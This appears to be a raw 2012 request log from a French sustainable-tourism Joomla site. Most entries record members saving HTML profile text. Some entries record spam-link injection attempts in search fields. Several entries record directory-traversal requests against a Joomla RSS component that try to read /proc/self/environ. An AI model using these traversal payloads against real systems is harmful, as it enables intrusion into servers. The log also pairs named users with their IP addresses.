/emploi/offres-demploi/1304-charge-e-de-projets-evenementiel-developpemhttp://www.reseau-tee.net/eco-emploi/index.php?idOffre=cc08c3238830c&p=&module=offre&action=detail_offre&langue=frent-durable.html 2012-06-05 16:29:47 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5 IP: 82.226.128.119 USER: Emmeline Beaumont REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;Titulaire d\'un dipl&Atilde;&a PAR: cb_presentation2 2012-06-06 00:48:27 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 146.0.73.231 USER: visitor REQUEST: cp_text_search=fifqfupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.emzibozqva.com\&quot;&gt;jsfzb PAR: /emploi/offres-demploi/index.php?option=com_customproperties&view=show&task=show&Itemid=422&bind_to_section=19&cp_zone_geographique=france&cp_text_search=fifqfupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.emzibozqva.com%22%3Ejsfzbcckls%3C%2Fa%3E+%2C+%5Burl%3Dhttp%3A%2F%2Fwww.gsnnujyqsg.com%5Dedmlujjlmi%5B%2Furl%5D%2C+http%3A%2F%2Fwww.evsiywpxhk.com+jsfzbcckls&submit_search=Recherche 2012-06-06 10:53:55 USER_AGENT: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5 IP: 88.175.105.165 USER: NicolasATD REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;strong&gt;Projet FAST-LAIN PAR: cb_presentation2 2012-06-06 22:32:39 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 46.17.96.220 USER: visitor REQUEST: cp_text_search=miiosupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.pizjfsvbsd.com\&quot;&gt;xsqsn PAR: /emploi/offres-demploi/index.php?option=com_customproperties&view=show&task=show&Itemid=422&bind_to_section=19&cp_zone_geographique=france&cp_text_search=miiosupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.pizjfsvbsd.com%22%3Exsqsnswccp%3C%2Fa%3E+%2C+%5Burl%3Dhttp%3A%2F%2Fwww.iveitmxgwv.com%5Dnxqxgyzyrj%5B%2Furl%5D%2C+http%3A%2F%2Fwww.jmzfjrglwm.com+xsqsnswccp&submit_search=Recherche 2012-06-09 13:32:46 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5 IP: 82.226.128.119 USER: Emmeline Beaumont REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;Titulaire d\'un master pro en PAR: cb_presentation2 2012-06-09 13:39:38 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5 IP: 82.226.128.119 USER: Emmeline Beaumont REQUEST: data=&lt;p style=\&quot;text-align: justify;\&quot;&gt;Titulaire d\'un master professionnel en Ge PAR: data 2012-06-09 13:40:20 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5 IP: 82.226.128.119 USER: Emmeline Beaumont REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;Titulaire d\'un master profess PAR: cb_presentation2 2012-06-09 13:42:02 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5 IP: 82.226.128.119 USER: Emmeline Beaumont REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;Titulaire d\'un master profess PAR: cb_presentation2 2012-06-11 08:40:03 USER_AGENT: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB7.3; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8; MSOffice 12) IP: 193.52.198.250 USER: visitor REQUEST: option=com_acymailing PAR: http://www.tourisme-durable.org/index.php?option=com_acymailing&ctrl=stats&mailid=45&subid=6296 2012-06-21 08:56:04 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 146.0.73.231 USER: visitor REQUEST: cp_text_search=xmutlupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.vsksztkgos.com\&quot;&gt;sfacc PAR: /emploi/offres-demploi/index.php?option=com_customproperties&view=show&task=show&Itemid=422&bind_to_section=19&cp_zone_geographique=france&cp_text_search=xmutlupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.vsksztkgos.com%22%3Esfacceuzdg%3C%2Fa%3E+%2C+%5Burl%3Dhttp%3A%2F%2Fwww.dbulsgkvhs.com%5Ddlyiaetevw%5B%2Furl%5D%2C+http%3A%2F%2Fwww.xxexjjigdj.com+sfacceuzdg&submit_search=Recherche 2012-06-22 08:45:29 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 146.0.73.231 USER: visitor REQUEST: cp_text_search=fqnqvupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.aqiuxnhvna.com\&quot;&gt;qpkod PAR: /emploi/offres-demploi/index.php?option=com_customproperties&view=show&task=show&Itemid=422&bind_to_section=19&cp_zone_geographique=france&cp_text_search=fqnqvupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.aqiuxnhvna.com%22%3Eqpkodgguyr%3C%2Fa%3E+%2C+%5Burl%3Dhttp%3A%2F%2Fwww.irrttljtek.com%5Djuxlangeah%5B%2Furl%5D%2C+http%3A%2F%2Fwww.rujoeobvnr.com+qpkodgguyr&submit_search=Recherche 2012-06-25 07:36:57 USER_AGENT: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.5; OfficeLivePatch.1.3) IP: 110.139.183.236 USER: unmondeautrement REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;Appuy&Atilde;&copy; sur des va PAR: cb_presentation2 2012-06-25 17:39:33 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 91.237.249.69 USER: visitor REQUEST: cp_text_search=bxrohupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.ptverapswb.com\&quot;&gt;fxxvf PAR: /actualite/newsletter/user/index.php?option=com_customproperties&view=show&task=show&Itemid=627&bind_to_section=18&cp_type_produit=bruit&cp_type_ressource=actualite&cp_text_search=bxrohupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.ptverapswb.com%22%3Efxxvfmkuid%3C%2Fa%3E+%2C+%5Burl%3Dhttp%3A%2F%2Fwww.mounublsui.com%5Dqdiealjvhq%5B%2Furl%5D%2C+http%3A%2F%2Fwww.mczundalzh.com+fxxvfmkuid&submit_search=Recherche 2012-06-26 08:56:09 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 146.0.73.230 USER: visitor REQUEST: cp_text_search=&lt;a href=\&quot;http://pornsks4all.com/\&quot;&gt;upvsjtnf.evsbcmf&lt;/a&gt;, $R PAR: /actualite/newsletter/user/index.php?option=com_customproperties&view=show&task=show&Itemid=627&bind_to_section=18&cp_type_produit=bruit&cp_type_ressource=actualite&cp_text_search=%3Ca+href%3D%22http%3A%2F%2Fpornsks4all.com%2F%22%3Eupvsjtnf.evsbcmf%3C%2Fa%3E%2C+%24RandomStr%2C+%5Burl%3Dhttp%3A%2F%2Fpornsks4all.com%2F%5Dupvsjtnf.evsbcmf%5B%2Furl%5D%2C+%24RandomStr%2C+http%3A%2F%2Fpornsks4all.com%2F+upvsjtnf.evsbcmf%2C+%24RandomStr.&submit_search=Recherche 2012-06-26 09:03:39 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 91.237.249.69 USER: visitor REQUEST: cp_text_search=goybxupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.wvxzsxlzbu.com\&quot;&gt;kmmoa PAR: /actualite/newsletter/user/index.php?option=com_customproperties&view=show&task=show&Itemid=627&bind_to_section=18&cp_type_produit=bruit&cp_type_ressource=actualite&cp_text_search=goybxupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.wvxzsxlzbu.com%22%3Ekmmoajdrmp%3C%2Fa%3E+%2C+%5Burl%3Dhttp%3A%2F%2Fwww.wvvnyiizax.com%5Dxsmhtyleno%5B%2Furl%5D%2C+http%3A%2F%2Fwww.uazcgyqlpv.com+kmmoajdrmp&submit_search=Recherche 2012-06-27 03:03:55 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 91.237.249.69 USER: visitor REQUEST: cp_text_search=tyfyoupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.jbuezefsux.com\&quot;&gt;pshru PAR: /actualite/newsletter/user/index.php?option=com_customproperties&view=show&task=show&Itemid=627&bind_to_section=18&cp_type_produit=bruit&cp_type_ressource=actualite&cp_text_search=tyfyoupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.jbuezefsux.com%22%3Epshrunyinb%3C%2Fa%3E+%2C+%5Burl%3Dhttp%3A%2F%2Fwww.kkexwiwmpa.com%5Danjuocbkxh%5B%2Furl%5D%2C+http%3A%2F%2Fwww.iboboryegn.com+pshrunyinb&submit_search=Recherche 2012-06-27 17:53:13 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 91.237.249.69 USER: visitor REQUEST: cp_text_search=iakfhupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.pscyvbmgot.com\&quot;&gt;yqnwl PAR: /actualite/newsletter/user/index.php?option=com_customproperties&view=show&task=show&Itemid=627&bind_to_section=18&cp_type_produit=bruit&cp_type_ressource=actualite&cp_text_search=iakfhupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.pscyvbmgot.com%22%3Eyqnwlqptbv%3C%2Fa%3E+&submit_search=Recherche 2012-06-28 08:13:38 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5 IP: 91.237.249.69 USER: visitor REQUEST: cp_text_search=hgxypupvsjtnf.evsbcmf, &lt;a href=\&quot;http://www.ftrcmvbedm.com\&quot;&gt;iurod PAR: /actualite/newsletter/user/index.php?option=com_customproperties&view=show&task=show&Itemid=627&bind_to_section=18&cp_type_produit=bruit&cp_type_ressource=actualite&cp_text_search=hgxypupvsjtnf.evsbcmf%2C+%3Ca+href%3D%22http%3A%2F%2Fwww.ftrcmvbedm.com%22%3Eiurodbsvco%3C%2Fa%3E+&submit_search=Recherche 2012-07-02 14:46:25 USER_AGENT: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30) IP: 77.72.93.22 USER: Aventureo REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;display: block; margin-right: auto; margin-left: a PAR: cb_presentation2 2012-07-02 14:55:32 USER_AGENT: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30) IP: 77.72.93.22 USER: Aventureo REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;display: block; margin-right: auto; margin-left: a PAR: cb_presentation2 2012-07-03 10:46:27 USER_AGENT: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30) IP: 77.72.93.22 USER: Aventureo REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;display: block; margin-right: auto; margin-left: a PAR: cb_presentation2 2012-07-04 09:04:50 USER_AGENT: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30) IP: 77.72.93.22 USER: Aventureo REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;display: block; margin-right: auto; margin-left: a PAR: cb_presentation2 2012-07-04 09:25:50 USER_AGENT: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30) IP: 77.72.93.22 USER: Aventureo REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;display: block; margin-right: auto; margin-left: a PAR: cb_presentation2 2012-07-04 16:09:01 USER_AGENT: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1 IP: 78.112.24.69 USER: ClaireRingot REQUEST: cb_presentation2=&lt;div class=\&quot;content\&quot;&gt; &lt;p class=\&quot; description summary PAR: cb_presentation2 2012-07-04 16:20:09 USER_AGENT: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1 IP: 78.112.24.69 USER: ClaireRingot REQUEST: data=&lt;p&gt;Suite &Atilde;&nbsp; un licenciement &Atilde;&copy;conomique, je suis actuellement PAR: data 2012-07-04 16:20:51 USER_AGENT: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1 IP: 78.112.24.69 USER: ClaireRingot REQUEST: cb_presentation2=&lt;p&gt;Suite &Atilde;&nbsp; un licenciement &Atilde;&copy;conomique, je suis a PAR: cb_presentation2 2012-07-04 16:21:38 USER_AGENT: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1 IP: 78.112.24.69 USER: ClaireRingot REQUEST: data=&lt;p&gt;Suite &Atilde;&nbsp; un licenciement &Atilde;&copy;conomique, je suis actuellement PAR: data 2012-07-04 16:22:21 USER_AGENT: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1 IP: 78.112.24.69 USER: ClaireRingot REQUEST: cb_presentation2=&lt;p&gt;Suite &Atilde;&nbsp; un licenciement &Atilde;&copy;conomique, je suis a PAR: cb_presentation2 2012-07-04 16:23:08 USER_AGENT: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1 IP: 78.112.24.69 USER: ClaireRingot REQUEST: cb_presentation2=&lt;p&gt;Suite &Atilde;&nbsp; un licenciement &Atilde;&copy;conomique, je suis a PAR: cb_presentation2 2012-07-05 09:08:06 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11 IP: 82.229.176.236 USER: Aventureo REQUEST: cb_presentation2=&lt;p class=\&quot;MsoNormal\&quot; style=\&quot;text-align: justify;\&quot;&gt; PAR: cb_presentation2 2012-07-05 16:12:37 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 IP: 92.140.147.17 USER: visitor REQUEST: option=com_content PAR: /index.php?option=com_content&view=article&id=1405:ethic-etapes-un-reseau-qui-sengage&catid=141:demarches-exemplaires&Itemid=752http://www.tourisme-durable.org/index.php?option=com_content&view=article&id=1405:ethic-etapes-un-reseau-qui-sengage&catid=141:demarches-exemplaires&Itemid=752 2012-07-06 03:06:46 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 IP: 195.43.154.230 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /////?option=com_ninjarsssyndicator&controller=..//..//..//..//..//..//..//..///proc/self/environ%0000 2012-07-06 03:07:40 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 IP: 195.43.154.230 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /component/ninjarsssyndicator/////?option=com_ninjarsssyndicator&controller=..//..//..//..//..//..//..//..///proc/self/environ%0000 2012-07-06 03:07:41 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 IP: 195.43.154.230 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /////?option=com_ninjarsssyndicator&controller=..//..//..//..//..//..//..//..///proc/self/environ%0000 2012-07-06 03:07:41 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 IP: 195.43.154.230 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /component/////?option=com_ninjarsssyndicator&controller=..//..//..//..//..//..//..//..///proc/self/environ%0000 2012-07-18 16:02:58 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:14.0) Gecko/20100101 Firefox/14.0 IP: 213.44.39.86 USER: JulienBugli REQUEST: cb_engagements2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;Je cherche &Atilde;&nbsp; m\'in PAR: cb_engagements2 2012-07-18 16:04:53 USER_AGENT: Mozilla/5.0 (Windows NT 6.0; rv:14.0) Gecko/20100101 Firefox/14.0 IP: 213.44.39.86 USER: JulienBugli REQUEST: cb_presentation2=&lt;p&gt;Je cherche &Atilde;&nbsp; m\'investir dans des activit&Atilde;&copy;s d PAR: cb_presentation2 2012-08-01 16:25:34 USER_AGENT: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11 IP: 88.175.105.165 USER: IDTourism REQUEST: cb_presentation2=&lt;p&gt;&lt;a href=\&quot;http://www.id-tourisme.fr/\&quot;&gt;&lt;img style=\& PAR: cb_presentation2 2012-08-01 16:26:27 USER_AGENT: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11 IP: 88.175.105.165 USER: IDTourism REQUEST: cb_presentation2=&lt;p&gt;&lt;a href=\&quot;http://www.id-tourisme.fr/\&quot;&gt;&lt;img style=\& PAR: cb_presentation2 2012-08-01 16:27:05 USER_AGENT: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11 IP: 88.175.105.165 USER: IDTourism REQUEST: cb_presentation2=&lt;p&gt;&lt;a href=\&quot;http://www.id-tourisme.fr/\&quot;&gt;&lt;img style=\& PAR: cb_presentation2 2012-08-02 13:30:35 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.25 (KHTML, like Gecko) Version/6.0 Safari/536.25 IP: 81.13.152.128 USER: Pacte3F REQUEST: cb_presentation2=&lt;p&gt;&lt;a href=\&quot;http://www.pacte3f.ch/\&quot;&gt;&lt;img style=\&quot PAR: cb_presentation2 2012-08-02 13:32:29 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.25 (KHTML, like Gecko) Version/6.0 Safari/536.25 IP: 81.13.152.128 USER: Pacte3F REQUEST: cb_presentation2=&lt;p&gt;&lt;a href=\&quot;http://www.pacte3f.ch/\&quot;&gt;&lt;img style=\&quot PAR: cb_presentation2 2012-08-02 13:34:47 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.25 (KHTML, like Gecko) Version/6.0 Safari/536.25 IP: 81.13.152.128 USER: Pacte3F REQUEST: cb_presentation2=&lt;p&gt;&lt;a href=\&quot;http://www.pacte3f.ch/\&quot;&gt;&lt;img style=\&quot PAR: cb_presentation2 2012-08-02 13:37:11 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.25 (KHTML, like Gecko) Version/6.0 Safari/536.25 IP: 81.13.152.128 USER: Pacte3F REQUEST: cb_presentation2=&lt;p style=\&quot;margin: 12px 20px 12px 0px; padding: 0px; color: #16222a; fon PAR: cb_presentation2 2012-08-02 14:40:19 USER_AGENT: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) IP: 86.72.252.225 USER: gantonius REQUEST: cb_presentation2=&lt;p style=\&quot;margin: 0cm 0cm 0pt;\&quot;&gt;&lt;strong&gt;&lt;span style=\ PAR: cb_presentation2 2012-08-02 14:41:05 USER_AGENT: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) IP: 86.72.252.225 USER: gantonius REQUEST: cb_presentation2=&lt;p&gt;&lt;a href=\&quot;images/comprofiler/plug_cbfilefield/1045/CV_Georgette PAR: cb_presentation2 2012-08-02 14:48:24 USER_AGENT: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) IP: 86.72.252.225 USER: gantonius REQUEST: cb_presentation2=&lt;p style=\&quot;margin: 0cm 0cm 0pt;\&quot;&gt;&lt;strong&gt;&lt;span style=\ PAR: cb_presentation2 2012-08-02 14:52:40 USER_AGENT: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) IP: 86.72.252.225 USER: gantonius REQUEST: cb_presentation2=&lt;p style=\&quot;margin: 0cm 0cm 0pt;\&quot;&gt;&lt;strong&gt;&lt;span style=\ PAR: cb_presentation2 2012-08-02 15:00:56 USER_AGENT: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) IP: 86.72.252.225 USER: gantonius REQUEST: cb_presentation2=&lt;p&gt;&lt;a href=\&quot;images/comprofiler/plug_cbfilefield/1045/CV_Georgette PAR: cb_presentation2 2012-08-05 14:52:47 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.60 Safari/537.1 IP: 41.77.16.72 USER: tanymenatours REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: center;\&quot;&gt;&lt;span style=\&quot;color: #0 PAR: cb_presentation2 2012-08-09 19:39:30 USER_AGENT: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) IP: 77.195.194.148 USER: gantonius REQUEST: cb_presentation2=&lt;p&gt;&lt;a href=\&quot;images/comprofiler/plug_cbfilefield/1045/CV_Georgette PAR: cb_presentation2 2012-08-20 14:12:13 USER_AGENT: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) IP: 41.204.112.39 USER: tanymenatours REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: center;\&quot;&gt;&lt;span style=\&quot;color: #0 PAR: cb_presentation2 2012-08-26 15:15:15 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1 IP: 82.240.99.10 USER: visitor REQUEST: option=com_content PAR: /index.php?option=com_content&view=article&id=1411:tendances-estivales-2012-le-tourisme-responsable-resiste-bien-a-la-crise&catid=3:marketing-touristique&Itemid=735%20http://www.tourisme-durable.org/index.php?option=com_content&view=article&id=1411:tendances-estivales-2012-le-tourisme-responsable-resiste-bien-a-la-crise&catid=3:marketing-touristique&Itemid=735 2012-08-27 10:23:47 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari/537.1 IP: 41.77.16.71 USER: tanymenatours REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: center;\&quot;&gt;&amp;nbsp;&lt;/p&gt; &lt;p sty PAR: cb_presentation2 2012-08-29 06:11:48 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari/537.1 IP: 41.77.16.71 USER: tanymenatours REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: center;\&quot;&gt;&lt;span style=\&quot;color: #0 PAR: cb_presentation2 2012-08-29 06:14:13 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari/537.1 IP: 41.77.16.71 USER: tanymenatours REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: center;\&quot;&gt;&lt;span style=\&quot;color: #0 PAR: cb_presentation2 2012-08-31 23:10:34 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 IP: 204.45.110.147 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /component/ninjarsssyndicator//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%0000 2012-08-31 23:10:40 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 IP: 204.45.110.147 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%0000 2012-08-31 23:10:40 USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 IP: 204.45.110.147 USER: visitor REQUEST: option=com_ninjarsssyndicator PAR: /component//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%0000 2012-09-03 21:36:26 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.5 Safari/534.55.3 IP: 89.83.55.248 USER: marion REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;strong&gt;C&lt;/strong&gt; PAR: cb_presentation2 2012-09-04 06:25:01 USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.5 Safari/534.55.3 IP: 89.83.55.248 USER: marion REQUEST: cb_presentation2=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;strong&gt;C&lt;/strong&gt; PAR: cb_presentation2 2012-09-04 13:10:49 USER_AGENT: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) IP: 86.72.252.231 USER: gantonius REQUEST: cb_presentation2=&lt;p&gt;&lt;a href=\&quot;images/comprofiler/plug_cbfilefield/1045/CV_Georgette PAR: cb_presentation2 2012-09-04 13:12:48 USER_AGENT: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) IP: 86.72.252.231 USER: gantonius REQUEST: cb_presentation2=&lt;p&gt;&lt;a href=\&quot;images/comprofiler/plug_cbfilefield/1045/CV_Georgette PAR: cb_presentation2 2012-09-05 13:47:32 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; rv:10.0.2) Gecko/20100101 Firefox/10.0.2 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;strong&gt;Journal du Tourisme Durable : PAR: t33 2012-09-05 13:48:32 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; rv:10.0.2) Gecko/20100101 Firefox/10.0.2 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;strong&gt;Journal du Tourisme Durable : PAR: t33 2012-09-05 13:50:47 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; rv:10.0.2) Gecko/20100101 Firefox/10.0.2 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;strong&gt;Journal du Tourisme Durable : PAR: t33 2012-09-05 13:51:49 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; rv:10.0.2) Gecko/20100101 Firefox/10.0.2 IP: 88.175.105.165 USER: visitor REQUEST: t33=&lt;p style=\&quot;text-align: justify;\&quot;&gt;&lt;strong&gt;Journal du Tourisme Durable : PAR: t33 2012-09-06 06:20:35 USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0 IP: 109.12.198.24 USER: mary.july REQUEST: cb_presentation2=&lt;p&gt;&lt;img style=\&quot;display: block; margin-left: auto; margin-right: a PAR: cb_presentation2 2012-09-06 06:28:51 